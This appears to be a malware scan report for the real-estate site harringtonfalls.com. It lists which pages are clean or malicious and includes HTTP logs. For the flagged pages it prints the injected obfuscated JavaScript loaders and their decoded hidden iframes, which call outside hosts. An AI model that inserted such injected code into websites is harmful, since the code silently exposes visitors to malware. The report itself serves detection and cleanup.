Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=harringtonfalls.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://harringtonfalls.com/ | 200 OK Content-Length: 12074 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) y=0;while(y<123)document.write(String.fromCharCode('=jgsbnf!tsd>#iuuq;00if.jt.tif/dp/dd0xfc0tfbsdi/qiq#!xjeui>#511#!ifjhiu>#511#!gsbnfcpsefs>#2#!tuzmf>#ejtqmbz;opof#?=0jgsbnf?'.charCodeAt(y++)-1)) Decoded script: <iframe src="http://he-is-she.co.cc/web/search.php" width="400" height="400" frameborder="1" style="display:none"></iframe> Antivirus reports:
| ||
http://harringtonfalls.com/index.html | 200 OK Content-Length: 12074 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) y=0;while(y<123)document.write(String.fromCharCode('=jgsbnf!tsd>#iuuq;00if.jt.tif/dp/dd0xfc0tfbsdi/qiq#!xjeui>#511#!ifjhiu>#511#!gsbnfcpsefs>#2#!tuzmf>#ejtqmbz;opof#?=0jgsbnf?'.charCodeAt(y++)-1)) Decoded script: <iframe src="http://he-is-she.co.cc/web/search.php" width="400" height="400" frameborder="1" style="display:none"></iframe> Antivirus reports:
| ||
http://harringtonfalls.com/neighborhoodinfo.html | 200 OK Content-Length: 27787 Content-Type: text/html | clean |
http://harringtonfalls.com/buyingahome.html | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://suspended.hostgator.com/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
http://harringtonfalls.com/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://harringtonfalls.com/homesforsale.html | 200 OK Content-Length: 6081 Content-Type: text/html | clean |
http://harringtonfalls.com/otherproperties.html | 200 OK Content-Length: 4839 Content-Type: text/html | clean |
http://harringtonfalls.com/real_estate_rebates.html | 200 OK Content-Length: 28657 Content-Type: text/html | clean |
http://harringtonfalls.com/sellyourhome.html | 200 OK Content-Length: 49326 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(window.document)aa=(Number+'evweds').substr(0,4);aaa=(Date+{}).substr(0,4);if(aa===aaa){ss=new String();s=String;12-function(){e=window['e'+'val'];f='fr';f=f+'omCharC'.concat('o','d','e');}();t='l';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=-1*(ddd-d2);n=["4.5l4.5l52.5l51l16l20l50l55.5l49.5l58.5l54.5l50.5l55l58l23l51.5l50.5l58l34.5l54l50.5l54.5l50.5l55l58l57.5l33l60.5l42l48.5l51.5l39l48.5l54.5l50.5l20l19.5l49l55.5l50l60.5l19.5l20.5l45.5l24l46.5l20.5l61.5l4.5l4.5l4.5l52.5l51l57l48.5l54.5l5 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://csmt.co.uk/images/test.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://csmt.co.uk/images/test.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAtt <iframe src='http://csmt.co.uk/images/test.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://harringtonfalls.com/contactus.html | 200 OK Content-Length: 8208 Content-Type: text/html | clean |
http://harringtonfalls.com/cashbackrebate.html | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: harringtonfalls.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 17:39:29 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 12074
Content-Type: text/html
Last-Modified: Mon, 23 Jan 2012 10:19:59 GMT
...12074 bytes of data.
GET / HTTP/1.1
Host: harringtonfalls.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 17:39:29 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 12074
Content-Type: text/html
Last-Modified: Mon, 23 Jan 2012 10:19:59 GMT
...12074 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: harringtonfalls.com
Referer: http://www.google.com/search?q=harringtonfalls.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: harringtonfalls.com
Referer: http://www.google.com/search?q=harringtonfalls.com
Result:
The result is similar to the first query. There are no suspicious redirects found.